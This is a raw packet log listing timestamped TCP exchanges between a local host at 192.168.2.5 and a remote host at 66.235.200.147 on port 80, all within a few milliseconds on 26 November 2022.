Nov 26, 2022 11:17:42.363122940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363154888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363183022 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363184929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363229036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363243103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363272905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363277912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363316059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363322973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363358974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363369942 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363414049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363459110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363466024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363502026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363517046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363544941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363555908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363586903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363605976 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363631964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363641977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363686085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363687992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363728046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363770962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363782883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363782883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363814116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363858938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363873005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363900900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363914013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363944054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363953114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.363986015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.363996029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364027977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364037037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364070892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364079952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364113092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364121914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364201069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364212990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364234924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364257097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364274025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364289999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364315987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364360094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364365101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364401102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364412069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364444017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364454985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364485025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364492893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364526987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364536047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364571095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364578962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364612103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364624023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364654064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364665985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364696980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364706993 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364737988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364779949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364795923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364823103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364865065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364870071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364870071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364919901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364927053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.364984035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.364990950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365052938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365061045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365108013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365118980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365149975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365192890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365202904 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365235090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365247965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365277052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365289927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365320921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365343094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365364075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365365982 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365406990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365417957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365452051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365457058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365493059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365500927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365535021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365545034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365577936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365583897 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365618944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365633011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365662098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365701914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365705013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365722895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365747929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365761042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365792036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365794897 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365837097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365878105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365888119 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365921021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365932941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.365962029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.365973949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.366004944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366014957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.366050005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366060019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.366094112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366101027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.366138935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366147041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.366179943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366211891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366244078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366277933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366311073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.366322994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366353989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.366364956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366409063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366416931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.366451025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366502047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.366513014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366559029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366600990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366614103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.366643906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366647959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.366683960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366725922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366733074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.366767883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366811037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366825104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.366852999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366916895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.366933107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.366996050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367048025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367054939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367115021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367131948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367168903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367213964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367223978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367258072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367304087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367306948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367346048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367363930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367363930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367381096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367399931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367422104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367423058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367441893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367460966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367474079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367480993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367491961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367491961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367501974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367521048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367533922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367544889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367563963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367564917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367583990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367603064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367621899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367623091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367636919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367643118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367662907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367676973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367682934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367703915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367705107 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367726088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367729902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367749929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367750883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367769957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367780924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367791891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367811918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367815971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367830992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367835045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367856026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367857933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367876053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367883921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367894888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367909908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367929935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367949009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367954969 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.367970943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.367994070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368002892 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368012905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368016005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368031979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368053913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368057013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368076086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368084908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368096113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368109941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368114948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368120909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368135929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368155956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368165970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368189096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368190050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368210077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368215084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368230104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368247986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368249893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368259907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368269920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368273973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368290901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368311882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368318081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368333101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368355989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368361950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368372917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368376970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368397951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368403912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368418932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368437052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368438005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368453026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368468046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368483067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368496895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368511915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368525028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368540049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368554115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368573904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368588924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368603945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368618011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368637085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368648052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368669987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368680000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368693113 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368697882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368716955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368721962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368741989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368762016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368765116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368782997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368803978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368804932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368827105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368833065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368848085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368856907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368869066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368869066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368887901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368887901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368906975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368926048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368937016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368947983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368963003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.368971109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.368982077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369000912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369003057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369021893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369026899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369041920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369061947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369080067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369081020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369092941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369100094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369121075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369122028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369148016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369151115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369172096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369187117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369196892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369201899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369224072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369225979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369241953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369251013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369271994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369273901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369292021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369312048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369319916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369329929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369339943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369349957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369363070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369370937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369374037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369390965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369399071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369410992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369431019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369442940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369451046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369471073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369482994 CET	49707	80	192.168.2.5	66.235.200.147
